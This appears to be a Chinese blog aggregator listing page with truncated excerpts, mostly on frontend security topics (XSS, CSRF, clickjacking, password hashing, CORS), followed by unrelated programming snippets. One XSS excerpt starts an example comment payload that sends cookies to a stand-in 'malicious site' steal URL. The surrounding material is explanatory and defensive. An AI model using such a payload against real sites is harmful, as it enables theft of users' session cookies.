- 前端安全-加密
姜慧慧
前端工程安全前端https
1密码安全1.1泄露渠道数据库被盗服务器被入侵通讯被窃听内部人员泄露其他网站(撞库)1.2防御严禁明文存储单向变换变换复杂度要求密码复杂度要求加盐(防止拆解)1.3哈希算法明文-密文一一对应彩虹表记录明文密文一一对应表,容易破解两次md5加密也容易破解所以密码必须复杂加盐加盐可以使密码更加难破解加盐+字符串+密码雪崩效应-明文:明文小幅度变化,密文加剧变化密文:明文无法反推密文固定长度:md5sh
- 前端安全之XSS攻击(跨域脚本攻击)
彭式程序猿
前端常见问题和解决方案汇总前端安全xss
提示:前端查漏补缺,仅代表个人观点,不接受任何批评文章目录一、XSS是什么?二、XSS类型划分1.反射性XSS(ReflectedXSS)2.存储型XSS(StoredXSS)3.基于DOM或本地的XSS攻击(DOM-basedorlocalXSS)三、XSS防范手段1.htmlencode转义特殊字符2.引入XSS库针对用户输入源过滤,设置标签白名单(node.js)3.cookie设置Http
- 前端安全XSS,CSRF
前端-JC
前端前端安全
XSS(Cross-sitescripting)跨站脚本攻击:用户在页面渲染数据时注入可运行的恶意脚本目的是盗用cookie,获取敏感信息,得到更高权限防御方法是对输入和输出进行严格过滤CSRF(Cross-siterequestforgery)跨站请求伪造:冒充受信认用户、向服务器发送非本意/非预期的请求认防御措施有cookit设置SameSite属性、验证请求请求头中Referer来源、表单请
- web前端安全性——iframe安全问题
장숙혜
前端安全性前端安全
1、概念iframe安全问题可称作界面劫持,像点击劫持、拖放劫持、触屏劫持。就是我们的点击,拖放,触屏操作被劫持了,而去操作了其它的透明隐藏的界面。**原理是利用透明层iframe,使用了CSS中的opacity或z-index等属性,来到达透明和位于其它界面的上方,然后使用iframe来嵌入劫持页面。**到达了用户操作的不是它看到的界面,不是他以为的那个界面,而是那个透明的位于上层的界面。代码:
- 前端安全字体
IT杨
serif类font-family:Garamond,serif;font-family:Georgia,serif;font-family:'TimesNewRoman',Times,serif;font-family:'BookmanOldStyle',serif;font-family:'PalatinoLinotype','BookAntiqua',Palatino,serif;2.san
- [vue源码01] data响应式 和 初始化渲染
woow_wu7
导航[深入01]执行上下文[深入02]原型链[深入03]继承[深入04]事件循环[深入05]柯里化偏函数函数记忆[深入06]隐式转换和运算符[深入07]浏览器缓存机制(http缓存机制)[深入08]前端安全[深入09]深浅拷贝[深入10]DebounceThrottle[深入11]前端路由[深入12]前端模块化[深入13]观察者模式发布订阅模式双向数据绑定[深入14]canvas[深入15]web
- 前端安全问题总结
大唐荣华
大前端前端安全网络安全CORSxssdos
XSS攻击Cross-SiteScripting(跨站脚本攻击)简称XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如Cookie、SessionID等,进而危害数据安全。所以,网页上哪些部分会引起XSS攻击?简单来说,任何可以输入的地方都有可能引起,包括URL!常见的注入方法在HTML中内嵌的文本中,恶意内容以
- [深入02] 原型链
woow_wu7
导航2021/07/21更新constructor.png2021/07/22更新原型链.png[深入01]执行上下文[深入02]原型链[深入03]继承[深入04]事件循环[深入05]柯里化偏函数函数记忆[深入06]隐式转换和运算符[深入07]浏览器缓存机制(http缓存机制)[深入08]前端安全[深入09]深浅拷贝[深入10]DebounceThrottle[深入11]前端路由[深入12]前端模
- 前端安全防范措施,xss攻击和csrf攻击
_咻咻咻咻咻
xss跨站脚本攻击简单来说,就是攻击者想办法将可执行的代码注入页面。分为持久性和非持久性。持久性就是攻击的代码被存入了数据库,会导致大量用户网页被攻击。eg:input框中写入alert(1),如果前后端没有防御,被存入数据库,每个打开该页面的用户都会被攻击。如何防御?转义字符functionescape(str){str=str.replace(/&/g,'&');str=str.replace
- 2024 高级前端面试题之 前端安全模块 「精选篇」
八了个戒
前端面试面试宝典大前端前端安全前端框架面试大前端web安全xss
该内容主要整理关于前端安全模块的相关面试题,其他内容面试题请移步至「最新最全的前端面试题集锦」查看。前端安全模块精选篇1.代码注入XSS如何攻击如何防御cookie如何防范XSS攻击2.跨站请求伪造CSRF3.浏览器同源策略SOP4.跨域资源共享CORS5.密码安全1.代码注入XSS跨网站指令码(英语:Cross-sitescripting,通常简称为:XSS)是一种网站应用程式的安全漏洞攻击,是
- [深入19] 手写Promise
woow_wu7
image导航[深入01]执行上下文[深入02]原型链[深入03]继承[深入04]事件循环[深入05]柯里化偏函数函数记忆[深入06]隐式转换和运算符[深入07]浏览器缓存机制(http缓存机制)[深入08]前端安全[深入09]深浅拷贝[深入10]DebounceThrottle[深入11]前端路由[深入12]前端模块化[深入13]观察者模式发布订阅模式双向数据绑定[深入14]canvas[深入1
- 前端安全之XSS、CSRF
菊の物语
前端安全xss
XSS(cross-site-script)跨站脚本攻击跨站脚本攻击是通过在网站中注入恶意代码,来达到劫取用户cookie信息,或者实施其他破坏行动。例如:一个网站如果没有针对XSS做响应的安全措施,而且它存在添加评论的功能,那么用户可以在添加评论时输入如下文本varxhr=newXMLHttpRequest();xhr.open('GET','http://恶意网站.com/steal?cook
- 前端安全
强某某
XSScsrfxss其实都是针对session(cookie)攻击的,只要登出则这些都无效了CrossSiteScripting跨站脚本攻击XSS(Cross-SiteScripting),跨站脚本攻击,因为缩写和CSS重叠,所以只能叫XSS。跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的非本站点HTML标签或JavaScript进行的一种攻击。跨站脚本攻击有可能造成以下
- 探索去中心化应用:技术挑战与未来趋势
AigcFox
去中心化区块链
去中心化应用(DApps)在技术上面临着一系列挑战和难题,这些挑战涉及到安全性、性能、用户体验、跨平台兼容性等多个方面。以下是一些主要的挑战:安全性:智能合约漏洞:智能合约代码可能存在漏洞或错误,导致资金损失或数据泄露。共识机制攻击:去中心化系统的共识机制可能遭受攻击,如51%攻击(在PoW系统中)、Sybil攻击(在基于权益证明的系统中)等。前端安全:前端界面可能遭受XSS攻击、CSRF攻击等,
- 前端安全相关
它经不起推敲的
前端安全
请求后端接口必须带上sign以上主要是解决:除了数据泄露外,一些重要功能的接口如果没有做好保护措施也会被恶意调用造成DDoS、条件竞争等攻击效果一些营销活动类的Web页面,领红包、领券、投票、抽奖等活动方式很常见。此类活动对于普通用户来说应该是“拼手气”,而对于非正常用户来说,可以通过直接刷活动API接口的这种“作弊”方式来提升“手气”。这样对普通用户来说就很不公平登录密码使用sha256加密后传
- [2017专题] 前端安全
weixin_34114823
前端爬虫数据库ViewUI
过往专题搬运。前端安全开发视角反击爬虫,前端工程师的脑洞可以有多大?预防竞争对手用爬虫进行的信息抓取,我们除了可以在后端进行图灵测试,也可以前端在DOM处做手脚来混淆爬虫。前端防御之CSP详解针对XSS的前端防御,本文作者介绍了CSP的作用与绕过方式,最后给出结论:黑名单配合CSP仍然是最靠谱的防御方式。点击劫持小抄介绍了预防点击劫持的多个方案汇总。XSSCookBook介绍了XSS的3个分类与2
- 前端安全专题
️不倒翁
前端集合前端安全javascript
xss(CrossSiteScripting)跨站脚本攻击原理通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。常见攻击类型存储型XSS攻击者将恶意的JavaScript脚本存储在网站的服务器上(例如,在一个评论区中发布含有恶意脚本的评论)。当其他用户浏览到包含这些脚本的页面时,就会执行这些脚本。反射型XSS反射型XSS只是简单地把用户输入
- XSS攻击以及java应对措施
jakiechaipush
Java零碎知识点罗列xssjava安全
文章目录一.XSS攻击介绍1.前端安全2.xss攻击简介3.xss的攻击方式二.java应对xss攻击的解决方案1.强制修改html敏感标签内容2.利用过滤器过滤非法html标签一.XSS攻击介绍1.前端安全随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的XSS、CSRF等安全问题之外,又时常遭遇网络劫持、
- 前端安全,常见的攻击类型以及如何防御
一月清辉
javascript前端安全
文章目录1、CSRF攻击1.1、什么是CSRF攻击1.2、CSRF攻击的过程1.3、如何防御CSRF攻击2、XSS攻击2.1、XSS攻击是什么2.2、XSS攻击有哪些类型2.3、XSS攻击可以进行以下操作2.4、如何防御XSS攻击3、token为什么就比cookie安全4、cookie、token是什么5、有哪些可能引起前端安全的问题?6、网络劫持有哪几种,如何防范?7、浏览器渲染进程的线程有哪些
- 前端安全:几种攻击模式
error_log
前端安全
1.XSS攻击主要是注入js代码,通过将js代码存入数据库或者通过修改URL参数的方式加入攻击代码,诱导用户访问链接从而进行攻击。防御措施:对字符串进行转义通常来说主要针对script标签进行转义functionescape(str){str=str.replace(/&/g,'&');str=str.replace(//g,'>');str=str.replace(/"/g,'&quto;');
- 前端安全- 常见的网络攻击
姜慧慧
前端工程前端安全web安全
1.xss攻击跨站脚本攻击1.1反射性攻击url参数直接注入(地址栏运行脚本)1.2影响利用虚假输入表单骗取用户个人信息利用脚本窃取用户的cookie值,被害者在不知情的情况下,帮助攻击者发送恶意请求显示伪造的文章或图片1.3存储型攻击存储到DB读取时注入1.4防御ctx.set(‘X-XSS-Protect’,‘0’)csp内容安全策略;白名单法:xss库,找到允许的代码;黑名单法:script
- 前端安全—常见的攻击方式及防御方法
WLANQY
前端安全网络攻击模型安全架构可信计算技术
Cookie挟持HTTP是无状态的协议,为了维持和跟踪用户的状态,引入了Cookie和Session。Cookie包含了浏览器客户端的用户凭证,相对较小。Session则维护在服务器,用于维护相对较大的用户信息。可以把Cookie当成密码,而Session是保险柜。由于HTTP是明文传输,Cookie很容易被盗取,如果被盗取,别人就可以冒充你的身份,打开你的保险柜,获取你的信息,动用你的资金,这是
- 前端常见安全问题
NJR10byh
笔记前端安全javascript
目录以下是对一些常见的前端安全问题的总结一、iframe1、防止自己的网站不被其他网站的iframe引用2、禁用被使用的iframe对当前网站某些操作二、opener1、target="_blank"2、window.open()三、CSRF/XSRF(跨站请求伪造)防御措施四、XSS/CSS(跨站脚本攻击)XSS类型:防御措施(对用户输入内容和服务端返回内容进行过滤和转译)五、ClickJack
- 7 种常见的前端安全攻击
极致人生-010
前端安全网络安全web安全网络攻击模型安全威胁分析
文章目录七种常见的前端攻击1.跨站脚本(XSS)2.依赖性风险3.跨站请求伪造(CSRF)4.点击劫持5.CDN篡改6.HTTPS降级7.中间人攻击随着Web应用程序对业务运营变得越来越重要,它们也成为更有吸引力的网络攻击目标。但不幸的是,与后端和DevOps同行相比,许多Web开发人员在构建安全前端方面已经落后。这种差距增加了破坏性数据泄露的风险。最近发生的诸如Balancer协议泄露之类的事件
- 彻底理解前端安全面试题(4)—— 中间人攻击,详解 http 和https 的中间人攻击实例,建议收藏(含源码)
我有一棵树
面试题穿成串一网打尽前端安全中间人攻击
前言前端关于网络安全问题看似高深莫测,其实来来回回就那么点东西,我总结一下就是3+1=4,3个用字母描述的【分别是XSS、CSRF、CORS】+一个中间人攻击。当然CORS同源策略是为了防止攻击的安全策略,其他的都是网络攻击。除了这4个前端相关的面试题,其他的都是一些不常用的小喽啰。我将会在我的《面试题一网打尽》专栏中先逐一详细介绍,然后再来一篇文章总结,预计一共5篇文章,欢迎大家关注~本篇文章是
- 彻底理解前端安全面试题(5)—— 总结篇,所有网络攻击面试题目总结,(已完结)
我有一棵树
面试题穿成串一网打尽前端安全面试
前言前端关于网络安全问题看似高深莫测,其实来来回回就那么点东西,我总结一下就是3+1=4,3个用字母描述的【分别是XSS、CSRF、CORS】+一个中间人攻击。当然CORS同源策略是为了防止攻击的安全策略,其他的都是网络攻击。除了这4个前端相关的面试题,其他的都是一些不常用的小喽啰。4个重要的安全相关内容我已经总结完,链接如下:彻底理解前端安全面试题(1)——XSS攻击彻底理解前端安全面试题(2)
- 使用 express 实现反向代理,解决跨域问题
我有一棵树
express代理
反向代理是对服务器的代理,可以使用express实现反向代理,很简单,具体代码请参考彻底理解前端安全面试题(3)——CORS跨域资源共享,解决跨域问题,建议收藏(含源码)-CSDN博客
- 彻底理解前端安全面试题(3)—— CORS跨域资源共享,解决跨域问题,建议收藏(含源码)
我有一棵树
面试题穿成串一网打尽前端安全跨域浏览器
前言前端关于网络安全看似高深莫测,其实来来回回就那么点东西,我总结一下就是3+1=4,3个用字母描述的【分别是XSS、CSRF、CORS】+一个中间人攻击。当然CORS同源策略是为了防止攻击的安全策略,其他的都是网络攻击。除了这4个前端相关的面试题,其他的都是一些不常用的小喽啰。我将会在我的《面试题一网打尽》专栏中先逐一详细介绍,然后再来一篇文章总结,预计一共5篇文章,欢迎大家关注~本篇文章是前端
- [部署03] gitlab-CI
woow_wu7
导航[深入01]执行上下文[深入02]原型链[深入03]继承[深入04]事件循环[深入05]柯里化偏函数函数记忆[深入06]隐式转换和运算符[深入07]浏览器缓存机制(http缓存机制)[深入08]前端安全[深入09]深浅拷贝[深入10]DebounceThrottle[深入11]前端路由[深入12]前端模块化[深入13]观察者模式发布订阅模式双向数据绑定[深入14]canvas[深入15]web
- 彻底理解前端安全面试题(2)—— CSRF 攻击,跨站请求伪造攻击详解,建议收藏(含源码)
我有一棵树
面试题穿成串一网打尽前端安全csrf
前言前端关于网络安全看似高深莫测,其实来来回回就那么点东西,我总结一下就是3+1=4,3个用字母描述的【分别是XSS、CSRF、CORS】+一个中间人攻击。当然CORS同源策略是为了防止攻击的安全策略,其他的都是网络攻击。除了这4个前端相关的面试题,其他的都是一些不常用的小喽啰。我将会在我的《面试题一网打尽》专栏中先逐一详细介绍,然后再来一篇文章总结,预计一共5篇文章,欢迎大家关注~本篇文章是前端
- mongodb3.03开启认证
21jhf
mongodb
下载了最新mongodb3.03版本,当使用--auth 参数命令行开启mongodb用户认证时遇到很多问题,现总结如下:
(百度上搜到的基本都是老版本的,看到db.addUser的就是,请忽略)
Windows下我做了一个bat文件,用来启动mongodb,命令行如下:
mongod --dbpath db\data --port 27017 --directoryperdb --logp
- 【Spark103】Task not serializable
bit1129
Serializable
Task not serializable是Spark开发过程最令人头疼的问题之一,这里记录下出现这个问题的两个实例,一个是自己遇到的,另一个是stackoverflow上看到。等有时间了再仔细探究出现Task not serialiazable的各种原因以及出现问题后如何快速定位问题的所在,至少目前阶段碰到此类问题,没有什么章法
1.
package spark.exampl
- 你所熟知的 LRU(最近最少使用)
dalan_123
java
关于LRU这个名词在很多地方或听说,或使用,接下来看下lru缓存回收的实现
1、大体的想法
a、查询出最近最晚使用的项
b、给最近的使用的项做标记
通过使用链表就可以完成这两个操作,关于最近最少使用的项只需要返回链表的尾部;标记最近使用的项,只需要将该项移除并放置到头部,那么难点就出现 你如何能够快速在链表定位对应的该项?
这时候多
- Javascript 跨域
周凡杨
JavaScriptjsonp跨域cross-domain
 
- linux下安装apache服务器
g21121
apache
安装apache
下载windows版本apache,下载地址:http://httpd.apache.org/download.cgi
1.windows下安装apache
Windows下安装apache比较简单,注意选择路径和端口即可,这里就不再赘述了。 2.linux下安装apache:
下载之后上传到linux的相关目录,这里指定为/home/apach
- FineReport的JS编辑框和URL地址栏语法简介
老A不折腾
finereportweb报表报表软件语法总结
JS编辑框:
1.FineReport的js。
作为一款BS产品,browser端的JavaScript是必不可少的。
FineReport中的js是已经调用了finereport.js的。
大家知道,预览报表时,报表servlet会将cpt模板转为html,在这个html的head头部中会引入FineReport的js,这个finereport.js中包含了许多内置的fun
- 根据STATUS信息对MySQL进行优化
墙头上一根草
status
mysql 查看当前正在执行的操作,即正在执行的sql语句的方法为:
show processlist 命令
mysql> show global status;可以列出MySQL服务器运行各种状态值,我个人较喜欢的用法是show status like '查询值%';一、慢查询mysql> show variab
- 我的spring学习笔记7-Spring的Bean配置文件给Bean定义别名
aijuans
Spring 3
本文介绍如何给Spring的Bean配置文件的Bean定义别名?
原始的
<bean id="business" class="onlyfun.caterpillar.device.Business">
<property name="writer">
<ref b
- 高性能mysql 之 性能剖析
annan211
性能mysqlmysql 性能剖析剖析
1 定义性能优化
mysql服务器性能,此处定义为 响应时间。
在解释性能优化之前,先来消除一个误解,很多人认为,性能优化就是降低cpu的利用率或者减少对资源的使用。
这是一个陷阱。
资源时用来消耗并用来工作的,所以有时候消耗更多的资源能够加快查询速度,保持cpu忙绿,这是必要的。很多时候发现
编译进了新版本的InnoDB之后,cpu利用率上升的很厉害,这并不
- 主外键和索引唯一性约束
百合不是茶
索引唯一性约束主外键约束联机删除
目标;第一步;创建两张表 用户表和文章表
第二步;发表文章
1,建表;
---用户表 BlogUsers
--userID唯一的
--userName
--pwd
--sex
create
- 线程的调度
bijian1013
java多线程thread线程的调度java多线程
1. Java提供一个线程调度程序来监控程序中启动后进入可运行状态的所有线程。线程调度程序按照线程的优先级决定应调度哪些线程来执行。
2. 多数线程的调度是抢占式的(即我想中断程序运行就中断,不需要和将被中断的程序协商)
a) 
- 查看日志常用命令
bijian1013
linux命令unix
一.日志查找方法,可以用通配符查某台主机上的所有服务器grep "关键字" /wls/applogs/custom-*/error.log
二.查看日志常用命令1.grep '关键字' error.log:在error.log中搜索'关键字'2.grep -C10 '关键字' error.log:显示关键字前后10行记录3.grep '关键字' error.l
- 【持久化框架MyBatis3一】MyBatis版HelloWorld
bit1129
helloworld
MyBatis这个系列的文章,主要参考《Java Persistence with MyBatis 3》。
样例数据
本文以MySQL数据库为例,建立一个STUDENTS表,插入两条数据,然后进行单表的增删改查
CREATE TABLE STUDENTS
(
stud_id int(11) NOT NULL AUTO_INCREMENT,
- 【Hadoop十五】Hadoop Counter
bit1129
hadoop
1. 只有Map任务的Map Reduce Job
File System Counters
FILE: Number of bytes read=3629530
FILE: Number of bytes written=98312
FILE: Number of read operations=0
FILE: Number of lar
- 解决Tomcat数据连接池无法释放
ronin47
tomcat 连接池 优化
近段时间,公司的检测中心报表系统(SMC)的开发人员时不时找到我,说用户老是出现无法登录的情况。前些日子因为手头上 有Jboss集群的测试工作,发现用户不能登录时,都是在Tomcat中将这个项目Reload一下就好了,不过只是治标而已,因为大概几个小时之后又会 再次出现无法登录的情况。
今天上午,开发人员小毛又找到我,要我协助将这个问题根治一下,拖太久用户难保不投诉。
简单分析了一
- java-75-二叉树两结点的最低共同父结点
bylijinnan
java
import java.util.LinkedList;
import java.util.List;
import ljn.help.*;
public class BTreeLowestParentOfTwoNodes {
public static void main(String[] args) {
/*
* node data is stored in
- 行业垂直搜索引擎网页抓取项目
carlwu
LuceneNutchHeritrixSolr
公司有一个搜索引擎项目,希望各路高人有空来帮忙指导,谢谢!
这是详细需求:
(1) 通过提供的网站地址(大概100-200个网站),网页抓取程序能不断抓取网页和其它类型的文件(如Excel、PDF、Word、ppt及zip类型),并且程序能够根据事先提供的规则,过滤掉不相干的下载内容。
(2) 程序能够搜索这些抓取的内容,并能对这些抓取文件按照油田名进行分类,然后放到服务器不同的目录中。
- [通讯与服务]在总带宽资源没有大幅增加之前,不适宜大幅度降低资费
comsci
资源
降低通讯服务资费,就意味着有更多的用户进入,就意味着通讯服务提供商要接待和服务更多的用户,在总体运维成本没有由于技术升级而大幅下降的情况下,这种降低资费的行为将导致每个用户的平均带宽不断下降,而享受到的服务质量也在下降,这对用户和服务商都是不利的。。。。。。。。
&nbs
- Java时区转换及时间格式
Cwind
java
本文介绍Java API 中 Date, Calendar, TimeZone和DateFormat的使用,以及不同时区时间相互转化的方法和原理。
问题描述:
向处于不同时区的服务器发请求时需要考虑时区转换的问题。譬如,服务器位于东八区(北京时间,GMT+8:00),而身处东四区的用户想要查询当天的销售记录。则需把东四区的“今天”这个时间范围转换为服务器所在时区的时间范围。
- readonly,只读,不可用
dashuaifu
jsjspdisablereadOnlyreadOnly
readOnly 和 readonly 不同,在做js开发时一定要注意函数大小写和jsp黄线的警告!!!我就经历过这么一件事:
使用readOnly在某些浏览器或同一浏览器不同版本有的可以实现“只读”功能,有的就不行,而且函数readOnly有黄线警告!!!就这样被折磨了不短时间!!!(期间使用过disable函数,但是发现disable函数之后后台接收不到前台的的数据!!!)
- LABjs、RequireJS、SeaJS 介绍
dcj3sjt126com
jsWeb
LABjs 的核心是 LAB(Loading and Blocking):Loading 指异步并行加载,Blocking 是指同步等待执行。LABjs 通过优雅的语法(script 和 wait)实现了这两大特性,核心价值是性能优化。LABjs 是一个文件加载器。RequireJS 和 SeaJS 则是模块加载器,倡导的是一种模块化开发理念,核心价值是让 JavaScript 的模块化开发变得更
- [应用结构]入口脚本
dcj3sjt126com
PHPyii2
入口脚本
入口脚本是应用启动流程中的第一环,一个应用(不管是网页应用还是控制台应用)只有一个入口脚本。终端用户的请求通过入口脚本实例化应用并将将请求转发到应用。
Web 应用的入口脚本必须放在终端用户能够访问的目录下,通常命名为 index.php,也可以使用 Web 服务器能定位到的其他名称。
控制台应用的入口脚本一般在应用根目录下命名为 yii(后缀为.php),该文
- haoop shell命令
eksliang
hadoophadoop shell
cat
chgrp
chmod
chown
copyFromLocal
copyToLocal
cp
du
dus
expunge
get
getmerge
ls
lsr
mkdir
movefromLocal
mv
put
rm
rmr
setrep
stat
tail
test
text
- MultiStateView不同的状态下显示不同的界面
gundumw100
android
只要将指定的view放在该控件里面,可以该view在不同的状态下显示不同的界面,这对ListView很有用,比如加载界面,空白界面,错误界面。而且这些见面由你指定布局,非常灵活。
PS:ListView虽然可以设置一个EmptyView,但使用起来不方便,不灵活,有点累赘。
<com.kennyc.view.MultiStateView xmlns:android=&qu
- jQuery实现页面内锚点平滑跳转
ini
JavaScripthtmljqueryhtml5css
平时我们做导航滚动到内容都是通过锚点来做,刷的一下就直接跳到内容了,没有一丝的滚动效果,而且 url 链接最后会有“小尾巴”,就像#keleyi,今天我就介绍一款 jquery 做的滚动的特效,既可以设置滚动速度,又可以在 url 链接上没有“小尾巴”。
效果体验:http://keleyi.com/keleyi/phtml/jqtexiao/37.htmHTML文件代码:
&
- kafka offset迁移
kane_xie
kafka
在早前的kafka版本中(0.8.0),offset是被存储在zookeeper中的。
到当前版本(0.8.2)为止,kafka同时支持offset存储在zookeeper和offset manager(broker)中。
从官方的说明来看,未来offset的zookeeper存储将会被弃用。因此现有的基于kafka的项目如果今后计划保持更新的话,可以考虑在合适
- android > 搭建 cordova 环境
mft8899
android
1 , 安装 node.js
http://nodejs.org
node -v 查看版本
2, 安装 npm
可以先从 https://github.com/isaacs/npm/tags 下载 源码 解压到
- java封装的比较器,比较是否全相同,获取不同字段名字
qifeifei
非常实用的java比较器,贴上代码:
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import net.sf.json.JSONArray;
import net.sf.json.JSONObject;
import net.sf.json.JsonConfig;
i
- 记录一些函数用法
.Aky.
位运算PHP数据库函数IP
高手们照旧忽略。
想弄个全天朝IP段数据库,找了个今天最新更新的国内所有运营商IP段,copy到文件,用文件函数,字符串函数把玩下。分割出startIp和endIp这样格式写入.txt文件,直接用phpmyadmin导入.csv文件的形式导入。(生命在于折腾,也许你们觉得我傻X,直接下载人家弄好的导入不就可以,做自己的菜鸟,让别人去说吧)
当然用到了ip2long()函数把字符串转为整型数
- sublime text 3 rust
wudixiaotie
Sublime Text
1.sublime text 3 => install package => Rust
2.cd ~/.config/sublime-text-3/Packages
3.mkdir rust
4.git clone https://github.com/sp0/rust-style
5.cd rust-style
6.cargo build --release
7.ctrl